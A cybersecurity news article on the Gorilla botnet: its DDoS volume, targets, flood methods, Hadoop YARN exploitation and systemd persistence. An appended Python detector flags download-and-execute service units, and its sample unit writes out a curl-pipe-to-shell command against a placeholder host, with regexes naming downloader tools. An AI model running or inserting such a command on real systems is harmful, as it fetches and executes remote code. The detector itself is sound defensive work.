
Gorilla Botnet Unleashes 300,000 DDoS Attacks in 100 Countries

Cybersecurity researchers have found a new botnet malware family known as Gorilla (also called GorillaBot), which is a variant of the leaked Mirai botnet source code.

A report from cybersecurity firm NSFOCUS revealed that Gorilla “sent out over 300,000 attack commands, demonstrating a significant attack density” between September 4 and September 27, 2024. The botnet has been initiating around 20,000 commands for distributed denial-of-service (DDoS) attacks daily on average.

The targets of the botnet span over 100 countries, affecting various sectors including universities, government websites, telecoms, banks, gaming, and gambling industries. Notably, China, the U.S., Canada, and Germany were the most impacted by these attacks.

Gorilla conducts its DDoS attacks using UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood techniques. Because UDP is connectionless, the botnet can spoof source IP addresses to generate high traffic volumes.

In addition to supporting different CPU architectures such as ARM, MIPS, x86_64, and x86, Gorilla can connect to one of the five predefined command-and-control (C2) servers to receive DDoS commands.

Interestingly, the malware includes capabilities to exploit a vulnerability in Apache Hadoop YARN RPC for remote code execution. This vulnerability has been exploited in the past, as reported by Alibaba Cloud and Trend Micro.

To ensure persistence on the host, Gorilla creates a service file named custom.service in the “/etc/systemd/system/” directory, which runs automatically at system startup. This service downloads and executes a shell script (“lol.sh”) from a remote server (“pen.gorillafirewall[.]su”). Commands are also added to other system files for executing the shell script.
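As an added example (not from the article or from NSFOCUS), a small Python checker for the persistence pattern just described: it flags systemd units whose Exec directive downloads a remote script and hands it to a shell, and reports whether the unit is enabled at boot. The sample unit and its hostname are constructed placeholders, not captured indicators.

```python
import re
from pathlib import Path

# Hypothetical detection helper written for this article (not NSFOCUS code):
# flags systemd units whose Exec*= command downloads something from a remote
# host and hands it to a shell, the persistence pattern described above.
DOWNLOADER = re.compile(r"\b(curl|wget|tftp|ftpget)\b")
REMOTE_REF = re.compile(r"\b(https?|ftp)://|\b\d{1,3}(?:\.\d{1,3}){3}\b")
SHELL_EXEC = re.compile(r"\|\s*(sh|bash|ash)\b|\b(sh|bash|ash)\s+\S*\.sh\b")


def suspicious_reasons(unit_text: str) -> list[str]:
    """Return reasons a unit looks like a download-and-execute persistence hook."""
    reasons = []
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not (line.startswith("Exec") and "=" in line):
            continue
        cmd = line.split("=", 1)[1].strip()
        hits = [name for name, rx in (("downloader", DOWNLOADER),
                                      ("remote-ref", REMOTE_REF),
                                      ("shell-exec", SHELL_EXEC)) if rx.search(cmd)]
        if len(hits) >= 2:  # a single indicator alone is common in benign units
            reasons.append(f"{cmd!r}: {', '.join(hits)}")
    if reasons and re.search(r"^WantedBy=.*multi-user\.target", unit_text, re.M):
        reasons.append("enabled at boot (WantedBy=multi-user.target)")
    return reasons


def scan_unit_dir(directory: str = "/etc/systemd/system") -> dict[str, list[str]]:
    """Map each suspicious *.service file in a directory to its reasons."""
    findings = {}
    for path in Path(directory).glob("*.service"):
        reasons = suspicious_reasons(path.read_text(errors="replace"))
        if reasons:
            findings[path.name] = reasons
    return findings


# Constructed sample modelled on the unit described in the article; the host is a placeholder.
SAMPLE_UNIT = """[Unit]
Description=custom

[Service]
ExecStart=/bin/sh -c "curl -s http://remote.example.invalid/lol.sh | sh"
Restart=always

[Install]
WantedBy=multi-user.target
"""
```

Run `scan_unit_dir()` on a live host to list flagged units, or `suspicious_reasons(SAMPLE_UNIT)` to see the two findings the constructed sample produces.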

NSFOCUS mentioned that Gorilla exhibits sophistication by using encryption methods similar to those of the Keksec group to conceal critical information, along with multiple techniques to maintain control over IoT devices and cloud hosts, making it a notable emerging botnet family.
